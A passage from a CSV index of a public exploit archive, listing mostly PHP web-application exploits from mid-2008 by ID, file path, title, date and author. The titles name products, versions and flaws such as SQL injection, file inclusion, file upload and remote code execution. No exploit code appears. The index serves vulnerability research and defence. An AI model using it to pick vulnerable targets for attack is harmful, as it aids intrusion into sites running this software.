Cookie Handling",2008-07-13,S.W.A.T.,php,webapps, -6066,exploits/php/webapps/6066.txt,"Maian Search 1.1 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps, -6067,exploits/php/webapps/6067.pl,"Ultrastats 0.2.142 - 'players-detail.php' Blind SQL Injection",2008-07-13,DNX,php,webapps, -6068,exploits/php/webapps/6068.txt,"MFORUM 0.1a - Arbitrary Add Admin",2008-07-13,"CWH Underground",php,webapps, -6069,exploits/php/webapps/6069.txt,"ITechBids 7.0 gold - Cross-Site Scripting / SQL Injection",2008-07-13,Encrypt3d.M!nd,php,webapps, -6070,exploits/php/webapps/6070.php,"Scripteen Free Image Hosting Script 1.2 - 'cookie' Pass Grabber",2008-07-13,RMx,php,webapps, -6071,exploits/php/webapps/6071.txt,"CodeDB 1.1.1 - 'list.php' Local File Inclusion",2008-07-14,cOndemned,php,webapps, -6073,exploits/php/webapps/6073.txt,"bilboblog 2.1 - Multiple Vulnerabilities",2008-07-14,BlackH,php,webapps, -6074,exploits/php/webapps/6074.txt,"Pluck CMS 4.5.1 (Windows) - 'blogpost' Local File Inclusion",2008-07-14,BugReport.IR,php,webapps, -6075,exploits/php/webapps/6075.txt,"Galatolo Web Manager 1.3a - Cross-Site Scripting / SQL Injection",2008-07-15,StAkeR,php,webapps, -6076,exploits/php/webapps/6076.txt,"pSys 0.7.0 Alpha - Multiple Remote File Inclusions",2008-07-15,RoMaNcYxHaCkEr,php,webapps, -6078,exploits/php/webapps/6078.txt,"Pragyan CMS 2.6.2 - 'sourceFolder' Remote File Inclusion",2008-07-15,N3TR00T3R,php,webapps, -6079,exploits/php/webapps/6079.txt,"Comdev Web Blogger 4.1.3 - 'arcmonth' SQL Injection",2008-07-15,K-159,php,webapps, -6080,exploits/php/webapps/6080.txt,"PHP Help Agent 1.1 - 'content' Local File Inclusion",2008-07-15,BeyazKurt,php,webapps, -6081,exploits/php/webapps/6081.txt,"Galatolo Web Manager 1.3a - Insecure Cookie Handling",2008-07-15,"Virangar Security",php,webapps, -6082,exploits/php/webapps/6082.txt,"PhotoPost vBGallery 2.4.2 - Arbitrary File Upload",2008-07-15,"Cold Zero",php,webapps, -6084,exploits/php/webapps/6084.txt,"HockeySTATS Online 2.0 - Multiple SQL Injections",2008-07-15,Mr.SQL,php,webapps, -6085,exploits/php/webapps/6085.pl,"PHPizabi 0.848b C1 HFP1 - Remote Code Execution",2008-07-16,Inphex,php,webapps, -6086,exploits/php/webapps/6086.txt,"Joomla! Component DT Register - SQL Injection",2008-07-16,His0k4,php,webapps, -6087,exploits/php/webapps/6087.txt,"Alstrasoft Affiliate Network Pro - 'pgm' SQL Injection",2008-07-16,"Hussin X",php,webapps, -6088,exploits/php/webapps/6088.txt,"tplSoccerSite 1.0 - Multiple SQL Injections",2008-07-16,Mr.SQL,php,webapps, -6091,exploits/php/webapps/6091.txt,"PHPHoo3 < 5.2.6 - 'viewCat' SQL Injection",2008-07-17,Mr.SQL,php,webapps, -6092,exploits/php/webapps/6092.txt,"Alstrasoft Video Share Enterprise 4.5.1 - 'UID' SQL Injection",2008-07-17,"Hussin X",php,webapps, -6095,exploits/php/webapps/6095.pl,"Alstrasoft Article Manager Pro 1.6 - Blind SQL Injection",2008-07-17,GoLd_M,php,webapps, -6096,exploits/php/webapps/6096.txt,"preCMS 1 - 'index.php' SQL Injection",2008-07-17,Mr.SQL,php,webapps, -6097,exploits/php/webapps/6097.txt,"Arctic Issue Tracker 2.0.0 - 'filter' SQL Injection (1)",2008-07-17,QTRinux,php,webapps, -6098,exploits/php/webapps/6098.txt,"Aprox CMS Engine 5.1.0.4 - 'index.php' SQL Injection",2008-07-18,Mr.SQL,php,webapps, -6099,exploits/php/webapps/6099.txt,"Siteframe CMS 3.2.3 - 'folder.php' SQL Injection",2008-07-18,n0ne,php,webapps, -6102,exploits/php/webapps/6102.txt,"PHPFootball 1.6 - SQL Injection",2008-07-20,Mr.SQL,php,webapps, -6104,exploits/asp/webapps/6104.pl,"DigiLeave 1.2 - 'book_id' Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps, -6105,exploits/asp/webapps/6105.pl,"HRS Multi - 'key' Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps, -6107,exploits/php/webapps/6107.txt,"Interact 2.4.1 - 'help.php' Local File Inclusion",2008-07-21,DSecRG,php,webapps, -6108,exploits/cgi/webapps/6108.pl,"MojoClassifieds 2.0 - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps, -6109,exploits/cgi/webapps/6109.pl,"MojoPersonals - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps, -6110,exploits/cgi/webapps/6110.pl,"MojoJobs - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps, -6111,exploits/cgi/webapps/6111.pl,"MojoAuto - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps, -6112,exploits/php/webapps/6112.txt,"EZWebAlbum - Remote File Disclosure",2008-07-21,"Ghost Hacker",php,webapps, -6113,exploits/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 - 'filter' SQL Injection (2)",2008-07-21,ldma,php,webapps, -6114,exploits/php/webapps/6114.txt,"ShopCartDx 4.30 - 'pid' SQL Injection",2008-07-21,Cr@zy_King,php,webapps, -6115,exploits/php/webapps/6115.txt,"EZWebAlbum - Insecure Cookie Handling",2008-07-21,"Virangar Security",php,webapps, -6117,exploits/php/webapps/6117.txt,"YouTube blog 0.1 - Remote File Inclusion / SQL Injection / Cross-Site Scripting",2008-07-22,Unohope,php,webapps, -6119,exploits/asp/webapps/6119.txt,"Pre Survey Poll - 'catid' SQL Injection",2008-07-22,DreamTurk,asp,webapps, -6125,exploits/php/webapps/6125.txt,"Atom Photoblog 1.1.5b1 - 'photoId' SQL Injection",2008-07-24,Mr.SQL,php,webapps, -6126,exploits/php/webapps/6126.txt,"ibase 2.03 - Remote File Disclosure",2008-07-24,Dyshoo,php,webapps, -6127,exploits/php/webapps/6127.html,"WordPress Plugin Download Manager 0.2 - Arbitrary File Upload",2008-07-24,SaO,php,webapps, -6128,exploits/php/webapps/6128.txt,"Live Music Plus 1.1.0 - 'id' SQL Injection",2008-07-24,IRAQI,php,webapps, -6131,exploits/php/webapps/6131.txt,"XRms 1.99.2 - Remote File Inclusion / Cross-Site Scripting / Information Gathering",2008-07-25,AzzCoder,php,webapps, -6132,exploits/php/webapps/6132.txt,"Camera Life 2.6.2 - 'id' SQL Injection",2008-07-25,nuclear,php,webapps, -6133,exploits/php/webapps/6133.txt,"FizzMedia 1.51.2 - SQL Injection",2008-07-25,Mr.SQL,php,webapps, -6134,exploits/php/webapps/6134.txt,"PHPTest 0.6.3 - SQL Injection",2008-07-25,cOndemned,php,webapps, -6135,exploits/asp/webapps/6135.txt,"FipsCMS Light 2.1 - 'r' SQL Injection",2008-07-26,U238,asp,webapps, -6136,exploits/php/webapps/6136.txt,"PHPwebnews 0.2 MySQL Edition - 'SQL' Insecure Cookie Handling",2008-07-26,"Virangar Security",php,webapps, -6137,exploits/php/webapps/6137.txt,"IceBB 1.0-RC9.2 - Blind SQL Injection / Session Hijacking",2008-07-26,girex,php,webapps, -6138,exploits/php/webapps/6138.txt,"Mobius 1.4.4.1 - SQL Injection",2008-07-26,dun,php,webapps, -6139,exploits/php/webapps/6139.txt,"EPShop < 3.0 - 'pid' SQL Injection",2008-07-26,mikeX,php,webapps, -6140,exploits/php/webapps/6140.txt,"phpLinkat 0.1 - Insecure Cookie Handling / SQL Injection",2008-07-26,Encrypt3d.M!nd,php,webapps, -6141,exploits/php/webapps/6141.txt,"TriO 2.1 - 'browse.php' SQL Injection",2008-07-26,dun,php,webapps, -6142,exploits/php/webapps/6142.txt,"CMScout 2.05 - 'bit' Local File Inclusion",2008-07-27,"Khashayar Fereidani",php,webapps, -6143,exploits/php/webapps/6143.txt,"Getacoder clone - 'sb_protype' SQL Injection",2008-07-27,"Hussin X",php,webapps, -6144,exploits/php/webapps/6144.txt,"GC Auction Platinum - 'cate_id' SQL Injection",2008-07-27,"Hussin X",php,webapps, -6145,exploits/php/webapps/6145.txt,"SiteAdmin CMS - 'art' SQL Injection",2008-07-27,Cr@zy_King,php,webapps, -6146,exploits/php/webapps/6146.txt,"Pligg CMS 9.9.0 - 'story.php' SQL Injection",2008-07-28,"Hussin X",php,webapps, -6147,exploits/php/webapps/6147.txt,"Youtuber Clone - SQL Injection",2008-07-28,"Hussin X",php,webapps, -6148,exploits/php/webapps/6148.txt,"TalkBack 2.3.5 - 'Language' Local File Inclusion",2008-07-28,NoGe,php,webapps, -6149,exploits/php/webapps/6149.txt,"Dokeos E-Learning System 1.8.5 - Local File Inclusion",2008-07-28,DSecRG,php,webapps, -6150,exploits/php/webapps/6150.txt,"PixelPost 1.7.1 - 'language_full' Local File Inclusion",2008-07-28,DSecRG,php,webapps, -6153,exploits/php/webapps/6153.txt,"ATutor 1.6.1-pl1 - 'import.php' Remote File Inclusion",2008-07-28,"Khashayar Fereidani",php,webapps, -6154,exploits/php/webapps/6154.txt,"ViArt Shop 3.5 - 'category_id' SQL Injection",2008-07-28,"GulfTech Security",php,webapps, -6156,exploits/php/webapps/6156.txt,"Minishowcase 09b136 - 'lang' Local File Inclusion",2008-07-29,DSecRG,php,webapps, -6158,exploits/php/webapps/6158.pl,"e107 Plugin BLOG Engine 2.2 - Blind SQL Injection",2008-07-29,"Virangar Security",php,webapps, -6159,exploits/php/webapps/6159.txt,"Gregarius 0.5.4 - SQL Injection",2008-07-29,"GulfTech Security",php,webapps, -6160,exploits/php/webapps/6160.txt,"PHP Hosting Directory 2.0 - Remote File Inclusion",2008-07-29,RoMaNcYxHaCkEr,php,webapps, -6161,exploits/php/webapps/6161.txt,"HIOX Random Ad 1.3 - Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps, -6162,exploits/php/webapps/6162.txt,"HIOX Browser Statistics 2.0 - Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps, -6163,exploits/php/webapps/6163.txt,"PHP Hosting Directory 2.0 - Insecure Cookie Handling",2008-07-30,Stack,php,webapps, -6164,exploits/php/webapps/6164.txt,"nzFotolog 0.4.1 - 'action_file' Local File Inclusion",2008-07-30,"Khashayar Fereidani",php,webapps, -6165,exploits/php/webapps/6165.txt,"ZeeReviews - SQL Injection",2008-07-30,Mr.SQL,php,webapps, -6166,exploits/php/webapps/6166.php,"HIOX Random Ad 1.3 - Arbitrary Add Admin",2008-07-30,Stack,php,webapps, -6167,exploits/php/webapps/6167.txt,"Article Friendly Pro/Standard - SQL Injection",2008-07-30,Mr.SQL,php,webapps, -6168,exploits/php/webapps/6168.php,"HIOX Browser Statistics 2.0 - Arbitrary Add Admin",2008-07-30,Stack,php,webapps, -6169,exploits/php/webapps/6169.txt,"PozScripts Classified Ads Script - 'cid' SQL Injection",2008-07-30,"Hussin X",php,webapps, -6170,exploits/php/webapps/6170.txt,"TubeGuru Video Sharing Script - 'UID' SQL Injection",2008-07-30,"Hussin X",php,webapps, -6171,exploits/php/webapps/6171.pl,"eNdonesia 8.4 (Calendar Module) - SQL Injection",2008-07-30,Jack,php,webapps, -6172,exploits/php/webapps/6172.pl,"Pligg CMS 9.9.0 - Remote Code Execution",2008-07-30,"GulfTech Security",php,webapps, -6173,exploits/php/webapps/6173.txt,"Pligg CMS 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection",2008-07-30,"GulfTech Security",php,webapps, -6176,exploits/php/webapps/6176.txt,"PHPX 3.5.16 - Cookie Poisoning / Authentication Bypass",2008-07-31,gnix,php,webapps, -6177,exploits/php/webapps/6177.php,"Symphony 1.7.01 (non-patched) - Remote Code Execution",2008-07-31,Raz0r,php,webapps, -6178,exploits/php/webapps/6178.php,"Coppermine Photo Gallery 1.4.18 - Local File Inclusion / Remote Code Execution",2008-07-31,EgiX,php,webapps, -6179,exploits/php/webapps/6179.txt,"LetterIt 2 - 'Language' Local File Inclusion",2008-07-31,NoGe,php,webapps, -6180,exploits/php/webapps/6180.txt,"phpMyRealty 2.0.0 - 'location' SQL Injection",2008-08-01,CraCkEr,php,webapps, -6182,exploits/php/webapps/6182.txt,"phpAuction GPL Enhanced 2.51 - 'profile.php' SQL Injection",2008-08-01,"Hussin X",php,webapps, -6183,exploits/php/webapps/6183.txt,"ABG Blocking Script 1.0a - 'abg_path' Remote File Inclusion",2008-08-01,Lo$er,php,webapps, -6184,exploits/php/webapps/6184.txt,"E-topbiz Dating 3 PHP Script - 'mail_id' SQL Injection",2008-08-01,Corwin,php,webapps, -6185,exploits/php/webapps/6185.txt,"Scripts24 iTGP 1.0.4 - 'id' SQL Injection",2008-08-01,Mr.SQL,php,webapps, -6186,exploits/php/webapps/6186.txt,"Scripts24 iPost 1.0.1 - 'id' SQL Injection",2008-08-01,Mr.SQL,php,webapps, -6187,exploits/php/webapps/6187.txt,"eStoreAff 0.1 - 'cid' SQL Injection",2008-08-01,Mr.SQL,php,webapps, -6189,exploits/php/webapps/6189.txt,"GreenCart PHP Shopping Cart - 'id' SQL Injection",2008-08-01,"Hussin X",php,webapps, -6190,exploits/php/webapps/6190.txt,"phsBlog 0.1.1 - Multiple SQL Injections",2008-08-01,cOndemned,php,webapps, -6191,exploits/php/webapps/6191.txt,"e-vision CMS 2.02 - SQL Injection / Arbitrary File Upload / Information Gathering",2008-08-02,"Khashayar Fereidani",php,webapps, -6192,exploits/php/webapps/6192.txt,"k-links directory - SQL Injection / Cross-Site Scripting",2008-08-02,Corwin,php,webapps, -6193,exploits/php/webapps/6193.txt,"E-Store Kit-1 < 2 PayPal Edition - 'pid' SQL Injection",2008-08-02,Mr.SQL,php,webapps, -6194,exploits/php/webapps/6194.pl,"moziloCMS 1.10.1 - 'download.php' Arbitrary Download File",2008-08-02,Ams,php,webapps, -6199,exploits/php/webapps/6199.pl,"Joomla! Component EZ Store Remote - Blind SQL Injection",2008-08-03,His0k4,php,webapps, -6200,exploits/php/webapps/6200.txt,"syzygyCMS 0.3 - 'index.php' Local File Inclusion",2008-08-03,SirGod,php,webapps, -6203,exploits/php/webapps/6203.txt,"Dayfox Blog 4 - Multiple Local File Inclusions",2008-08-04,"Virangar Security",php,webapps, -6204,exploits/php/webapps/6204.txt,"Plogger 3.0 - SQL Injection",2008-08-05,"GulfTech Security",php,webapps, -6205,exploits/php/webapps/6205.txt,"iges CMS 2.0 - Cross-Site Scripting / SQL Injection",2008-08-05,BugReport.IR,php,webapps, -6206,exploits/php/webapps/6206.txt,"LiteNews 0.1 - Insecure Cookie Handling",2008-08-05,Scary-Boys,php,webapps, -6207,exploits/php/webapps/6207.txt,"LiteNews 0.1 - 'id' SQL Injection",2008-08-05,Stack,php,webapps, -6208,exploits/php/webapps/6208.txt,"Wsn (Multiple Products) - Local File Inclusion / Code Execution",2008-08-06,otmorozok428,php,webapps, -6209,exploits/php/webapps/6209.rb,"LoveCMS 1.6.2 Final - Remote Code Execution",2008-08-06,PoMdaPiMp,php,webapps, -6210,exploits/php/webapps/6210.rb,"LoveCMS 1.6.2 Final - Update Settings",2008-08-06,PoMdaPiMp,php,webapps, -6211,exploits/php/webapps/6211.txt,"Quate CMS 0.3.4 - Local File Inclusion / Cross-Site Scripting",2008-08-06,CraCkEr,php,webapps, -6213,exploits/php/webapps/6213.txt,"Free Hosting Manager 1.2/2.0 - Insecure Cookie Handling",2008-08-06,Scary-Boys,php,webapps, -6214,exploits/php/webapps/6214.php,"Discuz! 6.0.1 - 'searchid' SQL Injection",2008-08-06,james,php,webapps, -6215,exploits/php/webapps/6215.txt,"pPIM 1.0 - Arbitrary File Delete / Cross-Site Scripting",2008-08-10,BeyazKurt,php,webapps, -6219,exploits/php/webapps/6219.txt,"e107 < 0.7.11 - Arbitrary Variable Overwriting",2008-08-10,"GulfTech Security",php,webapps, -6221,exploits/php/webapps/6221.txt,"Vacation Rental Script 3.0 - 'id' SQL Injection",2008-08-10,CraCkEr,php,webapps, -6223,exploits/php/webapps/6223.php,"Quicksilver Forums 1.4.1 - SQL Injection",2008-08-10,irk4z,php,webapps, -6224,exploits/php/webapps/6224.txt,"txtSQL 2.2 Final - 'startup.php' Remote File Inclusion",2008-08-10,CraCkEr,php,webapps, -6225,exploits/php/webapps/6225.txt,"PHP-Ring Webring System 0.9.1 - Insecure Cookie Handling",2008-08-10,"Virangar Security",php,webapps, -6226,exploits/php/webapps/6226.txt,"psipuss 1.0 - Multiple SQL Injections",2008-08-10,"Virangar Security",php,webapps, -6228,exploits/php/webapps/6228.txt,"OpenImpro 1.1 - 'image.php' SQL Injection",2008-08-10,nuclear,php,webapps, -6230,exploits/php/webapps/6230.txt,"ZeeBuddy 2.1 - 'adid' SQL Injection",2008-08-11,"Hussin X",php,webapps, -6231,exploits/php/webapps/6231.txt,"pPIM 1.0 - Upload/Change Password",2008-08-11,Stack,php,webapps, -6232,exploits/php/webapps/6232.txt,"Ovidentia 6.6.5 - 'item' SQL Injection",2008-08-11,"Khashayar Fereidani",php,webapps, -6233,exploits/php/webapps/6233.txt,"BBlog 0.7.6 - 'mod' SQL Injection",2008-08-12,IP-Sh0k,php,webapps, -6234,exploits/php/webapps/6234.txt,"Joomla! 1.5.x - 'Token' Remote Admin Change Password",2008-08-12,d3m0n,php,webapps, -6235,exploits/php/webapps/6235.txt,"gelato CMS 0.95 - 'img' Remote File Disclosure",2008-08-13,JIKO,php,webapps, -6247,exploits/php/webapps/6247.txt,"dotCMS 1.6 - 'id' Local File Inclusion",2008-08-15,Don,php,webapps, -6249,exploits/php/webapps/6249.txt,"Zeeways ZeeJobsite 2.0 - 'adid' SQL Injection",2008-08-15,"Hussin X",php,webapps, -6250,exploits/php/webapps/6250.txt,"deeemm CMS (dmcms) 0.7.4 - Multiple Vulnerabilities",2008-08-15,"Khashayar Fereidani",php,webapps, -6254,exploits/php/webapps/6254.txt,"XNova 0.8 sp1 - 'xnova_root_path' Remote File Inclusion",2008-08-17,NuclearHaxor,php,webapps, -6255,exploits/php/webapps/6255.txt,"phpArcadeScript 4 - 'cat' SQL Injection",2008-08-17,"Hussin X",php,webapps, -6258,exploits/php/webapps/6258.txt,"PHPBasket - 'pro_id' SQL Injection",2008-08-17,r45c4l,php,webapps, -6259,exploits/php/webapps/6259.txt,"VidiScript (Avatar) - Arbitrary File Upload",2008-08-18,InjEctOr5,php,webapps, -6260,exploits/php/webapps/6260.txt,"cyberBB 0.6 - Multiple SQL Injections",2008-08-18,cOndemned,php,webapps, -6261,exploits/php/webapps/6261.txt,"PHP live helper 2.0.1 - Multiple Vulnerabilities",2008-08-18,"GulfTech Security",php,webapps, -6269,exploits/cgi/webapps/6269.txt,"TWiki 4.2.0 - 'configure' Remote File Disclosure",2008-08-19,Th1nk3r,cgi,webapps, -6270,exploits/php/webapps/6270.txt,"Affiliate Directory - 'id' SQL Injection",2008-08-19,"Hussin X",php,webapps, -6271,exploits/php/webapps/6271.txt,"Ad Board - 'id' SQL Injection",2008-08-19,"Hussin X",php,webapps, -6273,exploits/php/webapps/6273.txt,"SunShop Shopping Cart 4.1.4 - 'id' SQL Injection",2008-08-19,"GulfTech Security",php,webapps, -6276,exploits/php/webapps/6276.txt,"Banner Management Script - 'id' SQL Injection",2008-08-19,S.W.A.T.,php,webapps, -6277,exploits/php/webapps/6277.txt,"Active PHP BookMarks 1.1.02 - SQL Injection",2008-08-19,"Hussin X",php,webapps, -6279,exploits/php/webapps/6279.pl,"Pars4U Videosharing 1.0 - Cross-Site Scripting / Blind SQL Injection",2008-08-20,Mr.SQL,php,webapps, -6280,exploits/php/webapps/6280.txt,"phpBazar 2.0.2 - 'adid' SQL Injection",2008-08-20,e.wiZz!,php,webapps, -6281,exploits/php/webapps/6281.pl,"webEdition CMS - 'we_objectID' Blind SQL Injection",2008-08-20,Lidloses_Auge,php,webapps, -6284,exploits/php/webapps/6284.txt,"CustomCMS 4.0 - 'print.php' SQL Injection",2008-08-21,~!Dok_tOR!~,php,webapps, -6285,exploits/php/webapps/6285.txt,"Photocart 3.9 - Multiple SQL Injections",2008-08-21,~!Dok_tOR!~,php,webapps, -6286,exploits/php/webapps/6286.txt,"BandSite CMS 1.1.4 - Download Backup / Cross-Site Scripting / Cross-Site Request Forgery",2008-08-21,SirGod,php,webapps, -6287,exploits/php/webapps/6287.txt,"TinyCMS 1.1.2 - 'templater.php' Local File Inclusion",2008-08-21,cOndemned,php,webapps, -6288,exploits/php/webapps/6288.txt,"easysite 2.3 - Multiple Vulnerabilities",2008-08-21,SirGod,php,webapps, -6291,exploits/php/webapps/6291.txt,"noname script 1.1 - Multiple Vulnerabilities",2008-08-23,SirGod,php,webapps, -6292,exploits/php/webapps/6292.txt,"onenews Beta 2 - Cross-Site Scripting / HTML Injection / SQL Injection",2008-08-23,suN8Hclf,php,webapps, -6294,exploits/php/webapps/6294.txt,"5 star review - Cross-Site Scripting / SQL Injection",2008-08-24,Mr.SQL,php,webapps, -6295,exploits/php/webapps/6295.txt,"MiaCMS 4.6.5 - Multiple SQL Injections",2008-08-24,~!Dok_tOR!~,php,webapps, -6296,exploits/php/webapps/6296.txt,"BtiTracker 1.4.7 / xbtit 2.0.542 - SQL Injection",2008-08-25,InATeam,php,webapps, -6297,exploits/php/webapps/6297.txt,"Matterdaddy Market 1.1 - 'index.php' Multiple SQL Injections",2008-08-25,~!Dok_tOR!~,php,webapps, -6298,exploits/php/webapps/6298.txt,"Web Directory Script 2.0 - 'name' SQL Injection",2008-08-25,~!Dok_tOR!~,php,webapps, -6300,exploits/php/webapps/6300.txt,"Pluck CMS 4.5.2 - Multiple Local File Inclusions",2008-08-25,DSecRG,php,webapps, -6301,exploits/php/webapps/6301.txt,"EZContents CMS 2.0.3 - Multiple Local File Inclusions",2008-08-25,DSecRG,php,webapps, -6303,exploits/php/webapps/6303.txt,"WebBoard 2.0 - Arbitrary SQL Question/Anwser Delete",2008-08-25,t0pP8uZz,php,webapps, -6306,exploits/php/webapps/6306.pl,"GeekLog 1.5.0 - Arbitrary File Upload",2008-08-25,t0pP8uZz,php,webapps, -6307,exploits/php/webapps/6307.txt,"Crafty Syntax Live Help 2.14.6 - 'department' SQL Injection",2008-08-25,"GulfTech Security",php,webapps, -6309,exploits/php/webapps/6309.txt,"z-breaknews 2.0 - 'single.php' SQL Injection",2008-08-26,cOndemned,php,webapps, -6310,exploits/php/webapps/6310.txt,"Kolifa.net Download Script 1.2 - 'id' SQL Injection",2008-08-26,Kacak,php,webapps, -6311,exploits/php/webapps/6311.php,"Simple PHP Blog (SPHPBlog) 0.5.1 - Code Execution",2008-08-26,mAXzA,php,webapps, -6312,exploits/php/webapps/6312.txt,"k-rate - SQL Injection / Cross-Site Scripting",2008-08-26,Corwin,php,webapps, -6313,exploits/php/webapps/6313.txt,"CMME 1.12 - Local File Inclusion / Cross-Site Scripting / Cross-Site Request Forgery/Download Backup/Make Directory",2008-08-26,SirGod,php,webapps, -6314,exploits/php/webapps/6314.txt,"Thickbox Gallery 2.0 - 'Admins.php' Admin Data Disclosure",2008-08-26,SirGod,php,webapps, -6315,exploits/php/webapps/6315.txt,"iFdate 2.0.3 - SQL Injection",2008-08-26,~!Dok_tOR!~,php,webapps, -6316,exploits/php/webapps/6316.php,"MyBulletinBoard (MyBB) 1.2.11 - 'private.php' SQL Injection (2)",2008-08-26,c411k,php,webapps, -6320,exploits/php/webapps/6320.txt,"PHPMyRealty 1.0.9 - Multiple SQL Injections",2008-08-27,~!Dok_tOR!~,php,webapps, -6321,exploits/php/webapps/6321.txt,"Yourownbux 3.1/3.2 Beta - SQL Injection",2008-08-27,~!Dok_tOR!~,php,webapps, -6325,exploits/php/webapps/6325.php,"Invision Power Board 2.3.5 - Multiple Vulnerabilities (2)",2008-08-29,DarkFig,php,webapps, -6332,exploits/php/webapps/6332.txt,"Brim 2.0.0 - SQL Injection / Cross-Site Scripting",2008-08-30,InjEctOr5,php,webapps, -6335,exploits/php/webapps/6335.txt,"Web Directory Script 1.5.3 - 'site' SQL Injection",2008-08-31,"Hussin X",php,webapps, -6336,exploits/php/webapps/6336.txt,"Words tag script 1.2 - 'word' SQL Injection",2008-08-31,"Hussin X",php,webapps, -6338,exploits/php/webapps/6338.txt,"myPHPNuke < 1.8.8_8rc2 - Cross-Site Scripting / SQL Injection",2008-08-31,MustLive,php,webapps, -6339,exploits/php/webapps/6339.txt,"webid 0.5.4 - Multiple Vulnerabilities",2008-08-31,InjEctOr5,php,webapps, -6341,exploits/php/webapps/6341.txt,"WeBid 0.5.4 - 'item.php' SQL Injection",2008-09-01,Stack,php,webapps, -6342,exploits/php/webapps/6342.txt,"EasyClassifields 3.0 - 'go' SQL Injection",2008-09-01,e.wiZz!,php,webapps, -6343,exploits/php/webapps/6343.txt,"CMSbright - 'id_rub_page' SQL Injection",2008-09-01,"BorN To K!LL",php,webapps, -6344,exploits/php/webapps/6344.php,"WeBid 0.5.4 - 'FCKeditor' Arbitrary File Upload",2008-09-01,Stack,php,webapps, -6346,exploits/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 - 'uid' SQL Injection",2008-09-01,"Virangar Security",php,webapps, -6347,exploits/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 - 'artid' SQL Injection",2008-09-02,MustLive,php,webapps, -6348,exploits/php/webapps/6348.txt,"Coupon Script 4.0 - 'id' SQL Injection",2008-09-02,"Hussin X",php,webapps, -6349,exploits/php/webapps/6349.txt,"Reciprocal Links Manager 1.1 - 'site' SQL Injection",2008-09-02,"Hussin X",php,webapps, -6350,exploits/php/webapps/6350.txt,"AJ HYIP ACME - 'comment.php' SQL Injection",2008-09-02,"security fears team",php,webapps, -6351,exploits/php/webapps/6351.txt,"AJ HYIP ACME - 'readarticle.php' SQL Injection",2008-09-02,InjEctOr5,php,webapps, -6352,exploits/php/webapps/6352.txt,"CS-Cart 1.3.5 - Authentication Bypass",2008-09-02,"GulfTech Security",php,webapps, -6354,exploits/php/webapps/6354.txt,"Spice Classifieds - 'cat_path' SQL Injection",2008-09-03,InjEctOr5,php,webapps, -6356,exploits/php/webapps/6356.php,"Moodle 1.8.4 - Remote Code Execution",2008-09-03,zurlich.lpt,php,webapps, -6357,exploits/php/webapps/6357.txt,"aspwebalbum 3.2 - Arbitrary File Upload / SQL Injection / Cross-Site Scripting",2008-09-03,Alemin_Krali,php,webapps, -6360,exploits/php/webapps/6360.txt,"TransLucid 1.75 - 'FCKeditor' Arbitrary File Upload",2008-09-03,BugReport.IR,php,webapps, -6361,exploits/php/webapps/6361.txt,"Living Local Website - 'listtest.php' SQL Injection",2008-09-03,"Hussin X",php,webapps, -6362,exploits/php/webapps/6362.txt,"ACG-PTP 1.0.6 - 'adid' SQL Injection",2008-09-04,"Hussin X",php,webapps, -6363,exploits/php/webapps/6363.txt,"qwicsite pro - SQL Injection / Cross-Site Scripting",2008-09-04,Cr@zy_King,php,webapps, -6364,exploits/php/webapps/6364.txt,"ACG-ScriptShop - 'cid' SQL Injection",2008-09-04,"Hussin X",php,webapps, -6368,exploits/php/webapps/6368.php,"AWStats Totals 1.14 - 'AWStatstotals.php' Remote Code Execution",2008-09-05,"Ricardo Almeida",php,webapps, -6369,exploits/php/webapps/6369.py,"Devalcms 1.4a - Cross-Site Scripting / Remote Code Execution",2008-09-05,"Khashayar Fereidani",php,webapps, -6370,exploits/php/webapps/6370.pl,"WebCMS Portal Edition - 'id' Blind SQL Injection",2008-09-05,JosS,php,webapps, -6371,exploits/php/webapps/6371.txt,"Vastal I-Tech Agent Zone - 'ann_id' SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps, -6373,exploits/php/webapps/6373.txt,"Vastal I-Tech Visa Zone - 'news_id' SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps, -6374,exploits/php/webapps/6374.txt,"Vastal I-Tech Toner Cart - 'id' SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps, -6375,exploits/php/webapps/6375.txt,"Vastal I-Tech Share Zone - 'id' SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps, -6376,exploits/php/webapps/6376.txt,"Vastal I-Tech DVD Zone - 'cat_id' SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps, -6378,exploits/php/webapps/6378.txt,"Vastal I-Tech Jobs Zone - 'news_id' SQL Injection",2008-09-05,Stack,php,webapps, -6379,exploits/php/webapps/6379.txt,"Vastal I-Tech MMORPG Zone - 'game_id' SQL Injection",2008-09-05,Stack,php,webapps, -6380,exploits/php/webapps/6380.txt,"Vastal I-Tech Mag Zone - 'cat_id' SQL Injection",2008-09-05,Stack,php,webapps, -6381,exploits/php/webapps/6381.txt,"Vastal I-Tech Freelance Zone - 'coder_id' SQL Injection",2008-09-05,Stack,php,webapps, -6382,exploits/php/webapps/6382.txt,"Vastal I-Tech Cosmetics Zone - 'cat_id' SQL Injection",2008-09-05,Stack,php,webapps, -6383,exploits/php/webapps/6383.txt,"EsFaq 2.0 - 'idcat' SQL Injection",2008-09-05,SuB-ZeRo,php,webapps, -6385,exploits/php/webapps/6385.txt,"Vastal I-Tech Shaadi Zone 1.0.9 - 'tage' SQL Injection",2008-09-05,e.wiZz!,php,webapps, -6388,exploits/php/webapps/6388.txt,"Vastal I-Tech Dating Zone - 'fage' SQL Injection",2008-09-06,ZoRLu,php,webapps, -6390,exploits/php/webapps/6390.txt,"Integramod 1.4.x - Insecure Directory Download Database",2008-09-06,TheJT,php,webapps, -6392,exploits/php/webapps/6392.php,"Simple Machines Forum (SMF) 1.1.5 (Windows x86) - Admin Reset Password",2008-09-06,Raz0r,php,webapps, -6393,exploits/php/webapps/6393.pl,"MemHT Portal 3.9.0 - Remote Create Shell",2008-09-06,Ams,php,webapps, -6395,exploits/php/webapps/6395.txt,"Masir Camp E-Shop Module 3.0 